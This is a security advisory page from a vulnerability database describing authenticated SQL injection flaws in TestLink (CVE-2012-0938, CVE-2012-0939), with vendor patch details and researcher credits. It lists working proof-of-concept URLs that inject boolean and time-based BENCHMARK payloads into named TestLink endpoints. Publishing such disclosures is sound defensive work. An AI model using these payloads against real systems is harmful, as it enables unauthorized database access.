Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27702
HistoryFeb 22, 2012 - 12:00 a.m.

SQL Injection Vulnerabilities in TestLink

2012-02-2200:00:00
vulners.com
20
JSON

Information

Name: SQL Injection Vulnerabilities in TestLink
Software tested: TL v1.8.5b & checked in v1.9.3 (prior version may be
affected)
Vendor Homepage: http://www.teamst.org
Vendor Notification: 27 January 2012
Vendor Patch: 4 February 2012
Public Disclosure: 20 February 2012
CVE: CVE-2012-0938 & CVE-2012-0939
Solution Status: Fixed by Vendor

Description

TestLink is a web based test management and test execution system. It
enables quality assurance teams to create and manage their test cases as
well as to organize them into test plans. These test plans allow team
members to execute test cases and track test results dynamically.

TestLink is a GPL licensed open source project.

Details

CVE-2012-0938:
TestLink v1.8.5b & 1.9.3 are affected by some SQL Injection
vulnerabilities (other versions also maybe affected).
To successfully exploit these vulnerabilities, a remote attacker must
login with a valid user account. Some cases need a different role to be
exploited.
CVSS v2: 6.5
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
Example PoC URLs are:

http://example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1
http://example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1
http://example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND
3653=BENCHMARK(5000000,MD5(1))
http://example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7
AND 5912=BENCHMARK(5000000,MD5(1))
http://example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623
AND 5912=BENCHMARK(5000000,MD5(1))
http://example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
http://example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))

CVE-2012-0939:
TestLink v1.8.5b is affected by some SQL Injection vulnerabilities
(other versions also maybe affected).
To successfully exploit these vulnerabilities, a remote attacker must
login with a valid user account. Some cases need a different role to be
exploited.
CVSS v2: 6.5
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
Example PoC URLs are:

http://example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622
OR 1=1
http://example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
http://example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))

Solution

The vendor fixed these vulnerabilities in a patch for version 1.9.3.
Please see the references.

References

Vendor URL / Patch : http://mantis.testlink.org/view.php?id=4906
CVE-2012-0938: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0938
CVE-2012-0939: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0939

Credits

Researcher: Juan M. Natal
Company: INTECO (http://www.inteco.es)
Contact: jnatal [at] cert [dot] inteco [dot] es

Thanks to: J. Valentin Gutierrez (@vnico) & Juan C. Montes (@jcmontes_tec)

Disclaimer

The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be
updated in order to provide as accurate information as possible.

Related

packetstorm 1
cve 2
prion 2
securityvulns 1
packetstorm
packetstorm
TestLink 1.9.3 SQL Injection
2012-02-20 00:00:00
cve
cve
CVE-2012-0939
2014-08-14 14:55:00
CVE-2012-0938
2014-08-14 14:55:00
prion
prion
Sql injection
2014-08-14 14:55:00
Sql injection
2014-08-14 14:55:00
securityvulns
securityvulns
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2012-02-22 00:00:00
JSON
Related for SECURITYVULNS:DOC:27702
packetstorm1cve2prion2securityvulns1